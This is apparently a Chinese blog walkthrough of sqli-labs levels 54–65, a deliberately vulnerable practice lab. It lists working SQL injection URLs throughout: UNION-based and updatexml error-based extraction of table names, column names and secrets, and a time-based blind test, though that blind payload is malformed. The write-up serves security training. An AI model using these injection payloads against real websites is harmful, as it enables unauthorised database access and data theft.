zoukankan      html  css  js  c++  java

  • sqli-labs Less54-Less65

    Less54

    从第54关开始,就比较偏向实际挑战方向,这一关对输入次数进行了限制,要求在十次之内,否则刷新数据库随机更新表名列名等信息

    首先判断包裹形式,这一关为单引号包裹

    http://127.0.0.1/sqli-labs-master/Less-54/?id=1'--+

     判断列数http://127.0.0.1/sqli-labs-master/Less-54/?id=1' order by 3--+

     查看当前数据库 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,database() --+  当前数据库为challenges

     查表 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='challenges'--+

    表名为f7fs4xzk70

     查字段 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='f7fs4xzk70'--+   

     查信息 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(concat_ws(0x7e,secret_DPET))from challenges.f7fs4xzk70 --+

    取出信息放入下面

     我们成功过关

     Less-55

    这一关有14次机会,包裹形式为?id=1)  其他步骤均与Less54相同

    Less-56

    这一关包裹形式为?id=1') 其他步骤均与Less54相同

    Less-57

    这一关有14次机会,包裹形式为?id=1" 其他步骤均与Less54相同

    Less-58

    这一关只有五次机会,显然不能使用联合查询,这一关我们使用报错注入

    有题目(刚打开的页面显示)可知,我们当前数据库为challenges

    查表 http://127.0.0.1/sqli-labs-master/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='challenges')),1)--+   表名为v000pri418

     查字段  http://127.0.0.1/sqli-labs-master/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='v000pri418')),1)--+   

     查信息 http://127.0.0.1/sqli-labs-master/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(0x7e,secret_T5XO)from challenges.v000pri418)),1)--+

     通关成功

     Less-59

    这一关没有包裹,其他均与第58关相同

    Less-60

    这一关的包裹形式为?id=1")  其他均与第58关相同,包裹形式不好测出,多试几次即可

    Less-61

    这一关的包裹形式为?id=1')  其他均与第58关相同,包裹形式不好测出,多试几次即可

    Less-62

    这一关给了130次机会,由此判断这一关主要使用盲注

    判断包裹形式  http://127.0.0.1/sqli-labs-master/Less-62/?id=1') --+  此次为单引号加括号

     由题目可知数据库名字为challenges

    测试数据库的长度

    http://127.0.0.1/sqli-labs-master/Less-62/?id=1') if((length(database())=1),1,sleep(5)--+  立刻回显

     剩下的可以查看第8-10关的内容,我们也可以使用burpsuit,参考前面的第5关。

    Less-63

    包裹形式为?id=1' 在要求与方法上,本关与Less-62相同。

    Less-64

    包裹形式为?id=1))  在要求与方法上,本关与Less-62相同。

    Less-65

    包裹形式为?id=1")在要求与方法上,本关与Less-62相同。
  • 相关阅读:
    定制博客园CSS
    后记:Cookie安全大辩论总结
    硬造的轮子趟过的坑--浮点型转字符串函数
    支付宝Cookie高危漏洞引发的思考
    博客园人氣提升密籍
    写个PHP框架吧
    开发一个程序员专用的搜索引擎
    三种常见网站工程师招聘条件总结
    golang之vscode环境配置
    golang环境安装
  • 原文地址:https://www.cnblogs.com/heiwa-0924/p/12397697.html
Copyright © 2011-2022 走看看